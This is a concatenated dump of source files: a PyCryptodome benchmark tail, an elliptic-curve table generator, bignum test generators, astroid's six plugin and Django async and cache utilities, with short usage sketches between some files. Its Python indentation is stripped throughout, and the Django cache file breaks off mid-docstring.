("AES256", AES, 32),
("Blowfish(256)", Blowfish, 32),
("CAST(128)", CAST, 16),
("ARC2(128)", ARC2, 16),
]
stream_specs = [
# Cipher name, module, key size, nonce size
("ARC4(128)", ARC4, 16, 0),
("Salsa20(16)", Salsa20, 16, 8),
("Salsa20(32)", Salsa20, 32, 8),
("ChaCha20", ChaCha20_old_style, 32, 8),
]
hash_specs = [
("MD2", MD2),
("MD4", MD4),
("MD5", MD5),
("SHA1", SHA1),
("SHA224", SHA224),
("SHA256", SHA256),
("SHA384", SHA384),
("SHA512", SHA512),
("SHA3_224", SHA3_224),
("SHA3_256", SHA3_256),
("SHA3_384", SHA3_384),
("SHA3_512", SHA3_512),
("BLAKE2b", BLAKE2b_512),
("BLAKE2s", BLAKE2s_256),
]
if RIPEMD160 is not None:
hash_specs += [("RIPEMD160", RIPEMD160)]
hashlib_specs = []
if hashlib is not None:
if hasattr(hashlib, 'md5'): hashlib_specs.append(("hashlib.md5", hashlib.md5))
if hasattr(hashlib, 'sha1'): hashlib_specs.append(("hashlib.sha1", hashlib.sha1))
if hasattr(hashlib, 'sha224'): hashlib_specs.append(("hashlib.sha224", hashlib.sha224))
if hasattr(hashlib, 'sha256'): hashlib_specs.append(("hashlib.sha256", hashlib.sha256))
if hasattr(hashlib, 'sha384'): hashlib_specs.append(("hashlib.sha384", hashlib.sha384))
if hasattr(hashlib, 'sha512'): hashlib_specs.append(("hashlib.sha512", hashlib.sha512))
# stdlib random
self.test_random_module("stdlib random", stdlib_random)
# Crypto.Random.random
self.test_random_module("Crypto.Random.random", pycrypto_random)
# Crypto.PublicKey
for pubkey_name, module, key_bytes in pubkey_specs:
self.test_pubkey_setup(pubkey_name, module, key_bytes)
# Crypto.Cipher (block ciphers)
for cipher_name, module, key_bytes in block_specs:
# Benchmark each cipher in each of the various modes (CBC, etc)
for mode_name, test_ks, params in block_cipher_modes:
mode_text = "%s-%s" % (cipher_name, mode_name)
try:
if test_ks:
self.test_key_setup(mode_text, module, key_bytes, params)
self.test_encryption(mode_text, module, key_bytes, params)
except ModeNotAvailable as e:
pass
# Crypto.Cipher (stream ciphers)
for cipher_name, module, key_bytes, nonce_bytes in stream_specs:
params = ""
if nonce_bytes:
params = "nonce=" + str(nonce_bytes)
self.test_key_setup(cipher_name, module, key_bytes, params)
self.test_encryption(cipher_name, module, key_bytes, params)
# Crypto.Hash
for hash_name, module in hash_specs:
self.test_hash_small(hash_name, module.new, module.digest_size)
self.test_hash_large(hash_name, module.new, module.digest_size)
# standard hashlib
for hash_name, func in hashlib_specs:
self.test_hash_small(hash_name, func, func().digest_size)
self.test_hash_large(hash_name, func, func().digest_size)
# PyCrypto HMAC
for hash_name, module in hash_specs:
if not hasattr(module, "block_size"):
continue
self.test_hmac_small("HMAC-"+hash_name, HMAC.new, module, module.digest_size)
self.test_hmac_large("HMAC-"+hash_name, HMAC.new, module, module.digest_size)
# standard hmac + hashlib
for hash_name, func in hashlib_specs:
if not hasattr(module, "block_size"):
continue
self.test_hmac_small("hmac+"+hash_name, hmac.HMAC, func, func().digest_size)
self.test_hmac_large("hmac+"+hash_name, hmac.HMAC, func, func().digest_size)
# CMAC
for cipher_name, module, key_size in (("AES128", AES, 16),):
self.test_cmac_small(cipher_name+"-CMAC", CMAC.new, module, key_size)
self.test_cmac_large(cipher_name+"-CMAC", CMAC.new, module, key_size)
# PKCS1_v1_5 (sign) + Crypto.Hash
for hash_name, module in hash_specs:
self.test_pkcs1_sign("PKCS#1-v1.5", RSASSA_PKCS1_v1_5.new, hash_name, module.new, module.digest_size)
# PKCS1_PSS (sign) + Crypto.Hash
for hash_name, module in hash_specs:
self.test_pkcs1_sign("PKCS#1-PSS", PKCS1_PSS.new, hash_name, module.new, module.digest_size)
# PKCS1_v1_5 (verify) + Crypto.Hash
for hash_name, module in hash_specs:
self.test_pkcs1_verify("PKCS#1-v1.5", RSASSA_PKCS1_v1_5.new, hash_name, module.new, module.digest_size)
# PKCS1_PSS (verify) + Crypto.Hash
for hash_name, module in hash_specs:
self.test_pkcs1_verify("PKCS#1-PSS", PKCS1_PSS.new, hash_name, module.new, module.digest_size)
if __name__ == '__main__':
Benchmark().run()
# vim:set ts=4 sw=4 sts=4 expandtab:
```
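The timing pattern used throughout the benchmark above (start a wall clock, run only the hot loop, divide the work done by the elapsed time) can be reproduced standalone. A minimal sketch using only the standard library's `hashlib`, so it runs without PyCryptodome; the function name and payload size are illustrative, not part of the original script:
```python
import hashlib
import os
import time

def hash_throughput_mbps(data, hash_name="sha256"):
    # Same measurement style as test_hash_large: time only the hashing work.
    h = hashlib.new(hash_name)
    t0 = time.time()
    h.update(data)
    h.digest()
    t = time.time()
    return len(data) / (t - t0) / 10**6

if __name__ == "__main__":
    payload = os.urandom(16 * 1024 * 1024)  # 16 MiB of random input
    print("sha256: %.1f MBps" % hash_throughput_mbps(payload))
```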
#### File: pycryptodome/src/make_ecc_table.py
```python
import argparse
declaration = """\
/* This file was automatically generated, do not edit */
#include "common.h"
extern const unsigned {0}_n_tables;
extern const unsigned {0}_window_size;
extern const unsigned {0}_points_per_table;
extern const uint64_t {0}_tables[{1}][{2}][2][{3}];
"""
definition = """\
/* This file was automatically generated, do not edit */
#include "common.h"
const unsigned {0}_n_tables = {1};
const unsigned {0}_window_size = {2};
const unsigned {0}_points_per_table = {3};
/* {4} */
/* Table size: {5} kbytes */
const uint64_t {0}_tables[{1}][{3}][2][{6}] = {{\
"""
point = """\
{{ /* Point #{0} */
{{ {1} }},
{{ {2} }}
}}{3}\
"""
parser = argparse.ArgumentParser()
parser.add_argument("curve")
parser.add_argument("window_size", type=int)
parser.add_argument("basename")
args = parser.parse_args()
if args.curve == "p256":
bits = 256
p = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
Gx = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
Gy = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5
msg = "Affine coordinates in Montgomery form"
elif args.curve == "p384":
bits = 384
p = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeffffffff0000000000000000ffffffff
Gx = 0xaa87ca22be8b05378eb1c71ef320ad746e1d3b628ba79b9859f741e082542a385502f25dbf55296c3a545e3872760aB7
Gy = 0x3617de4a96262c6f5d9e98bf9292dc29f8f41dbd289a147ce9da3113b5f0b8c00a60b1ce1d7e819d7a431d7c90ea0e5F
msg = "Affine coordinates in Montgomery form"
elif args.curve == "p521":
bits = 521
p = 0x000001ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
Gx = 0x000000c6858e06b70404e9cd9e3ecb662395b4429c648139053fb521f828af606b4d3dbaa14b5e77efe75928fe1dc127a2ffa8de3348b3c1856a429bf97e7e31c2e5bd66
Gy = 0x0000011839296a789a3bc0045c8a5fb42c7d1bd998f54449579b446817afbd17273e662c97ee72995ef42640c550b9013fad0761353c7086a272c24088be94769fd16650
msg = "Affine coordinates in plain form (not Montgomery)"
else:
raise ValueError("Unsupported curve: " + args.curve)
c_file = open(args.basename + ".c", "wt")
h_file = open(args.basename + ".h", "wt")
words = (bits + 63) // 64
window_size = args.window_size
points_per_table = 2**window_size
n_tables = (bits + window_size - 1) // window_size
byte_size = n_tables * points_per_table * 2 * (bits // 64) * (64 // 8) // 1024
G = Gx, Gy
def double(X1, Y1):
if X1 == 0 and Y1 == 0:
return (0, 0)
XX = pow(X1, 2, p)
w = -3 + 3 * XX
Y1Y1 = pow(Y1, 2, p)
R = 2 * Y1Y1
sss = 4 * Y1 * R
RR = pow(R, 2, p)
B = pow(X1 + R, 2, p) - XX - RR
h = pow(w, 2, p) - 2 * B
X3 = 2 * h * Y1 % p
Y3 = w * (B - h) - 2 * RR % p
Z3 = sss
Z3inv = pow(Z3, p - 2, p)
x3 = X3 * Z3inv % p
y3 = Y3 * Z3inv % p
return (x3, y3)
def add(X1, Y1, X2, Y2):
if X1 == 0 and Y1 == 0:
return (X2, Y2)
if X1 == X2 and Y1 == Y2:
return double(X1, Y1)
if X1 == X2 and (Y1 + Y2) % p == 0:
return (0, 0)
u = Y2 - Y1
uu = pow(u, 2, p)
v = X2 - X1
vv = pow(v, 2, p)
vvv = v * vv % p
R = vv * X1 % p
A = uu - vvv - 2 * R
X3 = v * A % p
Y3 = (u * (R - A) - vvv * Y1) % p
Z3 = vvv
Z3inv = pow(Z3, p - 2, p)
x3 = X3 * Z3inv % p
y3 = Y3 * Z3inv % p
return (x3, y3)
def get64(z, words):
"""Return a C string with the number encoded into 64-bit words"""
# Convert to Montgomery form, but only if it's not P521
if words != 9:
R = 2**(words * 64)
x = z * R % p
else:
x = z
result = []
for _ in range(words):
masked = x & ((1 << 64) - 1)
result.append("0x%016XULL" % masked)
x >>= 64
return ",".join(result)
# Create table with points 0, G, 2G, 3G, .. (2**window_size-1)G
window = [(0, 0)]
for _ in range(points_per_table - 1):
new_point = add(*window[-1], *G)
window.append(new_point)
print(declaration.format(args.curve, n_tables, points_per_table, words), file=h_file)
print(definition.format(args.curve, n_tables, window_size, points_per_table, msg,
byte_size, words), file=c_file)
for i in range(n_tables):
print(" { /* Table #%u */" % i, file=c_file)
for j, w in enumerate(window):
endc = "" if (j == points_per_table - 1) else ","
print(point.format(j, get64(w[0], words), get64(w[1], words), endc),
file=c_file)
endc = "" if (i == n_tables - 1) else ","
print(" }%s" % endc, file=c_file)
# Move from G to G*2^{w}
for j in range(window_size):
G = double(*G)
# Update window
for j in range(1, points_per_table):
window[j] = add(*window[j-1], *G)
print("};", file=c_file)
```
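The window size passed on the command line trades table size for scalar-multiplication speed. A small sketch that mirrors the generator's own `byte_size` arithmetic, handy for previewing the cost of a window before generating the tables (the helper name is ours, not part of the script):
```python
def table_kbytes(bits, window_size):
    # Mirrors the byte_size computation above: one table per window position,
    # 2**window_size points per table, two coordinates per point,
    # bits//64 words of 8 bytes each.
    points_per_table = 2 ** window_size
    n_tables = (bits + window_size - 1) // window_size
    return n_tables * points_per_table * 2 * (bits // 64) * 8 // 1024

for w in (2, 3, 4, 5):
    print("p256, window=%d -> ~%d kB of precomputed points" % (w, table_kbytes(256, w)))
```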
#### File: src/test/make_tests_addmul.py
```python
from common import counter, make_main, split64
def make_test(t, a, k):
if k == -1:
k = 0xFFFFFFFFFFFFFFFF
assert(0 <= k < 0x10000000000000000)
# What we expect the function to compute
result = t + a*k
# Turn a[] and t[] into arrays of 64-bit words
a = split64(a)
t_in = split64(t)
result = split64(result)
# Computation does not depend on zero terms
result_len = max(len(result), 1 + len(a))
# Pad the output vector with as many padding zeroes as needed
for x in xrange(result_len - len(t_in)):
t_in.append("0")
for x in xrange(result_len - len(result)):
result.append("0")
test_nr = counter.next()
print ""
print "void test_%d() {" % test_nr
#print ' printf("Test #%d\\n");' % test_nr
print " const uint64_t a[] = {" + ", ".join(a) + "};"
print " uint64_t t[] = {" + ", ".join(t_in) + ", 0xAAAAAAAAAAAAAAAAULL};"
print " const uint64_t expected_t[] = {" + ", ".join(result) + "};"
print ""
print " addmul(t, %d, a, %d, 0x%x);" % (result_len, len(a), k)
print " assert(memcmp(t, expected_t, 8*%d) == 0);" % result_len
print " assert(t[%d] == 0xAAAAAAAAAAAAAAAAULL);" % result_len
print "}"
print ""
print "#include <assert.h>"
print "#include <string.h>"
print "#include <stdint.h>"
print "#include <stdio.h>"
print ""
print "void addmul(uint64_t *t, size_t tw, const uint64_t *a, size_t aw, uint64_t k);"
make_test(0, 0, 0)
make_test(0, 1, 1)
make_test(0, 5, 5)
make_test(0, 0xFFFFFFFFFFFFFFFFFFF, -1)
make_test(0xFFFFFFFFFFFFFFFF, 1, 1)
make_test(32783243204234329232323, 9232922323, 39393938)
make_test(32783243204234329232323333333333333783839393,
92329223233877777777777777777777777838333, 0x1000000)
make_test(37893272389423987423987429837498237498237498274982374982734982374982734982743982374,
30309093333334930430493049304930940394039430303000009090909093434930493094039409340930493094309403940394039403940394039403940390493049304943,
0x1000000)
make_main()
```
#### File: src/test/make_tests_product.py
```python
from common import counter, make_main, split64
def make_test(a, b):
# Turn a[], b[] and the result into arrays of 64-bit words
result = split64(a*b)
a = split64(a)
b = split64(b)
# Pad the output vector with as many padding zeroes as needed
# Computation does not depend on zero terms
for _ in xrange(max(len(b), len(a)) - len(b)):
b.append("0")
for _ in xrange(max(len(b), len(a)) - len(a)):
a.append("0")
result_len = len(b) + len(a)
for _ in xrange(result_len - len(result)):
result.append("0")
# Fill output buffer with values that must be overwritten
t = [ "0xCCCCCCCCCCCCCCCCULL" ] * result_len
print ""
print "void test_%d() {" % counter.next()
print " const uint64_t a[] = {" + ", ".join(a) + "};"
print " const uint64_t b[] = {" + ", ".join(b) + "};"
print " uint64_t t[] = {" + ", ".join(t) + ", 0xAAAAAAAAAAAAAAAAULL};"
print " uint64_t scratchpad[%d];" % (3*len(a))
print " const uint64_t expected_t[] = {" + ", ".join(result) + "};"
print ""
print " product(t, scratchpad, a, b, %d);" % len(a)
print " assert(memcmp(t, expected_t, 8*%d) == 0);" % result_len
#print ' printf("t[{0}]=0x%016lX\\n", t[{0}]);'.format(result_len)
print " assert(t[%d] == 0xAAAAAAAAAAAAAAAAULL);" % result_len
print "}"
print ""
print "#include <assert.h>"
print "#include <string.h>"
print "#include <stdint.h>"
print "#include <stdio.h>"
print ""
print "void product(uint64_t *t, uint64_t *product, const uint64_t *a, const uint64_t *b, size_t words);"
make_test(0, 0)
make_test(1, 0)
make_test(27, 98)
make_test(27832782374324, 78237487324872348723847234)
make_test(0x786BF, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
make_test(0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF,
0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
make_main()
```
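Both test generators rely on `split64` (and `counter`/`make_main`) from a local `common` module that is not shown here. As a rough idea of what `split64` produces, here is a hypothetical equivalent; the exact formatting in the real `common.py` may differ:
```python
def split64_sketch(n):
    # Split a non-negative integer into little-endian 64-bit words,
    # formatted roughly the way the generated C test vectors expect them.
    if n == 0:
        return ["0"]
    words = []
    while n > 0:
        words.append("0x%016XULL" % (n & 0xFFFFFFFFFFFFFFFF))
        n >>= 64
    return words

print(split64_sketch(2**64 + 5))  # ['0x0000000000000005ULL', '0x0000000000000001ULL']
```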
|
{
"source": "jestinmwilson/personal-website",
"score": 2
}
|
#### File: astroid/brain/brain_six.py
```python
"""Astroid hooks for six module."""
from textwrap import dedent
from astroid import MANAGER, register_module_extender
from astroid.builder import AstroidBuilder
from astroid.exceptions import (
AstroidBuildingError,
InferenceError,
AttributeInferenceError,
)
from astroid import nodes
SIX_ADD_METACLASS = "six.add_metaclass"
def _indent(text, prefix, predicate=None):
"""Adds 'prefix' to the beginning of selected lines in 'text'.
If 'predicate' is provided, 'prefix' will only be added to the lines
where 'predicate(line)' is True. If 'predicate' is not provided,
it will default to adding 'prefix' to all non-empty lines that do not
consist solely of whitespace characters.
"""
if predicate is None:
predicate = lambda line: line.strip()
def prefixed_lines():
for line in text.splitlines(True):
yield prefix + line if predicate(line) else line
return "".join(prefixed_lines())
_IMPORTS = """
import _io
cStringIO = _io.StringIO
filter = filter
from itertools import filterfalse
input = input
from sys import intern
map = map
range = range
from importlib import reload
reload_module = lambda module: reload(module)
from functools import reduce
from shlex import quote as shlex_quote
from io import StringIO
from collections import UserDict, UserList, UserString
xrange = range
zip = zip
from itertools import zip_longest
import builtins
import configparser
import copyreg
import _dummy_thread
import http.cookiejar as http_cookiejar
import http.cookies as http_cookies
import html.entities as html_entities
import html.parser as html_parser
import http.client as http_client
import http.server as http_server
BaseHTTPServer = CGIHTTPServer = SimpleHTTPServer = http.server
import pickle as cPickle
import queue
import reprlib
import socketserver
import _thread
import winreg
import xmlrpc.server as xmlrpc_server
import xmlrpc.client as xmlrpc_client
import urllib.robotparser as urllib_robotparser
import email.mime.multipart as email_mime_multipart
import email.mime.nonmultipart as email_mime_nonmultipart
import email.mime.text as email_mime_text
import email.mime.base as email_mime_base
import urllib.parse as urllib_parse
import urllib.error as urllib_error
import tkinter
import tkinter.dialog as tkinter_dialog
import tkinter.filedialog as tkinter_filedialog
import tkinter.scrolledtext as tkinter_scrolledtext
import tkinter.simpledialog as tkinder_simpledialog
import tkinter.tix as tkinter_tix
import tkinter.ttk as tkinter_ttk
import tkinter.constants as tkinter_constants
import tkinter.dnd as tkinter_dnd
import tkinter.colorchooser as tkinter_colorchooser
import tkinter.commondialog as tkinter_commondialog
import tkinter.filedialog as tkinter_tkfiledialog
import tkinter.font as tkinter_font
import tkinter.messagebox as tkinter_messagebox
import urllib
import urllib.request as urllib_request
import urllib.robotparser as urllib_robotparser
import urllib.parse as urllib_parse
import urllib.error as urllib_error
"""
def six_moves_transform():
code = dedent(
"""
class Moves(object):
{}
moves = Moves()
"""
).format(_indent(_IMPORTS, " "))
module = AstroidBuilder(MANAGER).string_build(code)
module.name = "six.moves"
return module
def _six_fail_hook(modname):
"""Fix six.moves imports due to the dynamic nature of this
class.
Construct a pseudo-module which contains all the necessary imports
for six
:param modname: Name of failed module
:type modname: str
:return: An astroid module
:rtype: nodes.Module
"""
attribute_of = modname != "six.moves" and modname.startswith("six.moves")
if modname != "six.moves" and not attribute_of:
raise AstroidBuildingError(modname=modname)
module = AstroidBuilder(MANAGER).string_build(_IMPORTS)
module.name = "six.moves"
if attribute_of:
# Facilitate import of submodules in Moves
start_index = len(module.name)
attribute = modname[start_index:].lstrip(".").replace(".", "_")
try:
import_attr = module.getattr(attribute)[0]
except AttributeInferenceError:
raise AstroidBuildingError(modname=modname)
if isinstance(import_attr, nodes.Import):
submodule = MANAGER.ast_from_module_name(import_attr.names[0][0])
return submodule
# Let dummy submodule imports pass through
# This will cause an Uninferable result, which is okay
return module
def _looks_like_decorated_with_six_add_metaclass(node):
if not node.decorators:
return False
for decorator in node.decorators.nodes:
if not isinstance(decorator, nodes.Call):
continue
if decorator.func.as_string() == SIX_ADD_METACLASS:
return True
return False
def transform_six_add_metaclass(node):
"""Check if the given class node is decorated with *six.add_metaclass*
If so, inject its argument as the metaclass of the underlying class.
"""
if not node.decorators:
return
for decorator in node.decorators.nodes:
if not isinstance(decorator, nodes.Call):
continue
try:
func = next(decorator.func.infer())
except InferenceError:
continue
if func.qname() == SIX_ADD_METACLASS and decorator.args:
metaclass = decorator.args[0]
node._metaclass = metaclass
return node
register_module_extender(MANAGER, "six", six_moves_transform)
register_module_extender(
MANAGER, "requests.packages.urllib3.packages.six", six_moves_transform
)
MANAGER.register_failed_import_hook(_six_fail_hook)
MANAGER.register_transform(
nodes.ClassDef,
transform_six_add_metaclass,
_looks_like_decorated_with_six_add_metaclass,
)
```
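For context, this is the runtime pattern that `transform_six_add_metaclass` teaches astroid to understand statically (a minimal sketch, assuming `six` is installed; the class names are ours):
```python
import six

class Meta(type):
    pass

@six.add_metaclass(Meta)
class Widget(object):
    pass

# six rebuilds Widget with Meta as its metaclass at runtime; the astroid
# transform above injects the same metaclass during static inference so
# linters see it without executing the code.
assert type(Widget) is Meta
```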
#### File: django/utils/asyncio.py
```python
import asyncio
import functools
import os
from django.core.exceptions import SynchronousOnlyOperation
def async_unsafe(message):
"""
Decorator to mark functions as async-unsafe. Someone trying to access
the function while in an async context will get an error message.
"""
def decorator(func):
@functools.wraps(func)
def inner(*args, **kwargs):
if not os.environ.get('DJANGO_ALLOW_ASYNC_UNSAFE'):
# Detect a running event loop in this thread.
try:
event_loop = asyncio.get_event_loop()
except RuntimeError:
pass
else:
if event_loop.is_running():
raise SynchronousOnlyOperation(message)
# Pass onwards.
return func(*args, **kwargs)
return inner
# If the message is actually a function, then be a no-arguments decorator.
if callable(message):
func = message
message = 'You cannot call this from an async context - use a thread or sync_to_async.'
return decorator(func)
else:
return decorator
```
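A quick usage sketch for the decorator above (assumes Django 3.0+ is installed; the decorated function and its message are ours). Calling the function is fine when no event loop is running in the current thread, and raises `SynchronousOnlyOperation` from async code unless `DJANGO_ALLOW_ASYNC_UNSAFE` is set:
```python
import asyncio
from django.utils.asyncio import async_unsafe

@async_unsafe("connect() cannot be called from an async context.")
def connect():
    return "connected"

print(connect())  # works: no running event loop in this thread

async def main():
    return connect()  # the decorator detects the running loop

try:
    asyncio.run(main())
except Exception as exc:
    print(type(exc).__name__, "-", exc)  # SynchronousOnlyOperation
```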
#### File: django/utils/cache.py
```python
import hashlib
import re
import time
from django.conf import settings
from django.core.cache import caches
from django.http import HttpResponse, HttpResponseNotModified
from django.utils.encoding import iri_to_uri
from django.utils.http import (
http_date, parse_etags, parse_http_date_safe, quote_etag,
)
from django.utils.log import log_response
from django.utils.timezone import get_current_timezone_name
from django.utils.translation import get_language
cc_delim_re = re.compile(r'\s*,\s*')
def patch_cache_control(response, **kwargs):
"""
Patch the Cache-Control header by adding all keyword arguments to it.
The transformation is as follows:
* All keyword parameter names are turned to lowercase, and underscores
are converted to hyphens.
* If the value of a parameter is True (exactly True, not just a
true value), only the parameter name is added to the header.
* All other parameters are added with their value, after applying
str() to it.
"""
def dictitem(s):
t = s.split('=', 1)
if len(t) > 1:
return (t[0].lower(), t[1])
else:
return (t[0].lower(), True)
def dictvalue(t):
if t[1] is True:
return t[0]
else:
return '%s=%s' % (t[0], t[1])
if response.get('Cache-Control'):
cc = cc_delim_re.split(response['Cache-Control'])
cc = dict(dictitem(el) for el in cc)
else:
cc = {}
# If there's already a max-age header but we're being asked to set a new
# max-age, use the minimum of the two ages. In practice this happens when
# a decorator and a piece of middleware both operate on a given view.
if 'max-age' in cc and 'max_age' in kwargs:
kwargs['max_age'] = min(int(cc['max-age']), kwargs['max_age'])
# Allow overriding private caching and vice versa
if 'private' in cc and 'public' in kwargs:
del cc['private']
elif 'public' in cc and 'private' in kwargs:
del cc['public']
for (k, v) in kwargs.items():
cc[k.replace('_', '-')] = v
cc = ', '.join(dictvalue(el) for el in cc.items())
response['Cache-Control'] = cc
def get_max_age(response):
"""
Return the max-age from the response Cache-Control header as an integer,
or None if it wasn't found or wasn't an integer.
"""
if not response.has_header('Cache-Control'):
return
cc = dict(_to_tuple(el) for el in cc_delim_re.split(response['Cache-Control']))
try:
return int(cc['max-age'])
except (ValueError, TypeError, KeyError):
pass
def set_response_etag(response):
if not response.streaming:
response['ETag'] = quote_etag(hashlib.md5(response.content).hexdigest())
return response
def _precondition_failed(request):
response = HttpResponse(status=412)
log_response(
'Precondition Failed: %s', request.path,
response=response,
request=request,
)
return response
def _not_modified(request, response=None):
new_response = HttpResponseNotModified()
if response:
# Preserve the headers required by Section 4.1 of RFC 7232, as well as
# Last-Modified.
for header in ('Cache-Control', 'Content-Location', 'Date', 'ETag', 'Expires', 'Last-Modified', 'Vary'):
if header in response:
new_response[header] = response[header]
# Preserve cookies as per the cookie specification: "If a proxy server
# receives a response which contains a Set-cookie header, it should
# propagate the Set-cookie header to the client, regardless of whether
# the response was 304 (Not Modified) or 200 (OK).
# https://curl.haxx.se/rfc/cookie_spec.html
new_response.cookies = response.cookies
return new_response
def get_conditional_response(request, etag=None, last_modified=None, response=None):
# Only return conditional responses on successful requests.
if response and not (200 <= response.status_code < 300):
return response
# Get HTTP request headers.
if_match_etags = parse_etags(request.META.get('HTTP_IF_MATCH', ''))
if_unmodified_since = request.META.get('HTTP_IF_UNMODIFIED_SINCE')
if_unmodified_since = if_unmodified_since and parse_http_date_safe(if_unmodified_since)
if_none_match_etags = parse_etags(request.META.get('HTTP_IF_NONE_MATCH', ''))
if_modified_since = request.META.get('HTTP_IF_MODIFIED_SINCE')
if_modified_since = if_modified_since and parse_http_date_safe(if_modified_since)
# Step 1 of section 6 of RFC 7232: Test the If-Match precondition.
if if_match_etags and not _if_match_passes(etag, if_match_etags):
return _precondition_failed(request)
# Step 2: Test the If-Unmodified-Since precondition.
if (not if_match_etags and if_unmodified_since and
not _if_unmodified_since_passes(last_modified, if_unmodified_since)):
return _precondition_failed(request)
# Step 3: Test the If-None-Match precondition.
if if_none_match_etags and not _if_none_match_passes(etag, if_none_match_etags):
if request.method in ('GET', 'HEAD'):
return _not_modified(request, response)
else:
return _precondition_failed(request)
# Step 4: Test the If-Modified-Since precondition.
if (not if_none_match_etags and if_modified_since and
not _if_modified_since_passes(last_modified, if_modified_since)):
if request.method in ('GET', 'HEAD'):
return _not_modified(request, response)
# Step 5: Test the If-Range precondition (not supported).
# Step 6: Return original response since there isn't a conditional response.
return response
def _if_match_passes(target_etag, etags):
"""
Test the If-Match comparison as defined in section 3.1 of RFC 7232.
"""
if not target_etag:
# If there isn't an ETag, then there can't be a match.
return False
elif etags == ['*']:
# The existence of an ETag means that there is "a current
# representation for the target resource", even if the ETag is weak,
# so there is a match to '*'.
return True
elif target_etag.startswith('W/'):
# A weak ETag can never strongly match another ETag.
return False
else:
# Since the ETag is strong, this will only return True if there's a
# strong match.
return target_etag in etags
def _if_unmodified_since_passes(last_modified, if_unmodified_since):
"""
Test the If-Unmodified-Since comparison as defined in section 3.4 of
RFC 7232.
"""
return last_modified and last_modified <= if_unmodified_since
def _if_none_match_passes(target_etag, etags):
"""
Test the If-None-Match comparison as defined in section 3.2 of RFC 7232.
"""
if not target_etag:
# If there isn't an ETag, then there isn't a match.
return True
elif etags == ['*']:
# The existence of an ETag means that there is "a current
# representation for the target resource", so there is a match to '*'.
return False
else:
# The comparison should be weak, so look for a match after stripping
# off any weak indicators.
target_etag = target_etag.strip('W/')
etags = (etag.strip('W/') for etag in etags)
return target_etag not in etags
def _if_modified_since_passes(last_modified, if_modified_since):
"""
Test the If-Modified-Since comparison as defined in section 3.3 of RFC 7232.
"""
return not last_modified or last_modified > if_modified_since
def patch_response_headers(response, cache_timeout=None):
"""
Add HTTP caching headers to the given HttpResponse: Expires and
Cache-Control.
Each header is only added if it isn't already set.
cache_timeout is in seconds. The CACHE_MIDDLEWARE_SECONDS setting is used
by default.
"""
if cache_timeout is None:
cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
if cache_timeout < 0:
cache_timeout = 0 # Can't have max-age negative
if not response.has_header('Expires'):
response['Expires'] = http_date(time.time() + cache_timeout)
patch_cache_control(response, max_age=cache_timeout)
def add_never_cache_headers(response):
"""
Add headers to a response to indicate that a page should never be cached.
"""
patch_response_headers(response, cache_timeout=-1)
patch_cache_control(response, no_cache=True, no_store=True, must_revalidate=True, private=True)
def patch_vary_headers(response, newheaders):
"""
Add (or update) the "Vary" header in the given HttpResponse object.
newheaders is a list of header names that should be in "Vary". If headers
contains an asterisk, then "Vary" header will consist of a single asterisk
'*'. Otherwise, existing headers in "Vary" aren't removed.
"""
# Note that we need to keep the original order intact, because cache
# implementations may rely on the order of the Vary contents in, say,
# computing an MD5 hash.
if response.has_header('Vary'):
vary_headers = cc_delim_re.split(response['Vary'])
else:
vary_headers = []
# Use .lower() here so we treat headers as case-insensitive.
existing_headers = {header.lower() for header in vary_headers}
additional_headers = [newheader for newheader in newheaders
if newheader.lower() not in existing_headers]
vary_headers += additional_headers
if '*' in vary_headers:
response['Vary'] = '*'
else:
response['Vary'] = ', '.join(vary_headers)
def has_vary_header(response, header_query):
"""
Check to see if the response has a given header name in its Vary header.
"""
if not response.has_header('Vary'):
return False
vary_headers = cc_delim_re.split(response['Vary'])
existing_headers = {header.lower() for header in vary_headers}
return header_query.lower() in existing_headers
def _i18n_cache_key_suffix(request, cache_key):
"""If necessary, add the current locale or time zone to the cache key."""
if settings.USE_I18N or settings.USE_L10N:
# first check if LocaleMiddleware or another middleware added
# LANGUAGE_CODE to request, then fall back to the active language
# which in turn can also fall back to settings.LANGUAGE_CODE
cache_key += '.%s' % getattr(request, 'LANGUAGE_CODE', get_language())
if settings.USE_TZ:
cache_key += '.%s' % get_current_timezone_name()
return cache_key
def _generate_cache_key(request, method, headerlist, key_prefix):
"""Return a cache key from the headers given in the header list."""
ctx = hashlib.md5()
for header in headerlist:
value = request.META.get(header)
if value is not None:
ctx.update(value.encode())
url = hashlib.md5(iri_to_uri(request.build_absolute_uri()).encode('ascii'))
cache_key = 'views.decorators.cache.cache_page.%s.%s.%s.%s' % (
key_prefix, method, url.hexdigest(), ctx.hexdigest())
return _i18n_cache_key_suffix(request, cache_key)
def _generate_cache_header_key(key_prefix, request):
"""Return a cache key for the header cache."""
url = hashlib.md5(iri_to_uri(request.build_absolute_uri()).encode('ascii'))
cache_key = 'views.decorators.cache.cache_header.%s.%s' % (
key_prefix, url.hexdigest())
return _i18n_cache_key_suffix(request, cache_key)
def get_cache_key(request, key_prefix=None, method='GET', cache=None):
"""
Return a cache key based on the request URL and query. It can be used
in the request phase because it pulls the list of headers to take into
account from the global URL registry and uses those to build a cache key
to check against.
If there isn't a headerlist stored, return None, indicating that the page
needs to be rebuilt.
"""
if key_prefix is None:
key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
cache_key = _generate_cache_header_key(key_prefix, request)
if cache is None:
cache = caches[settings.CACHE_MIDDLEWARE_ALIAS]
headerlist = cache.get(cache_key)
if headerlist is not None:
return _generate_cache_key(request, method, headerlist, key_prefix)
else:
return None
def learn_cache_key(request, response, cache_timeout=None, key_prefix=None, cache=None):
"""
Learn what headers to take into account for some request URL from the
response object. Store those headers in a global URL registry so that
later access to that URL will know what headers to take into account
without building the response object itself. The headers are named in the
Vary header of the response, but we want to prevent response generation.
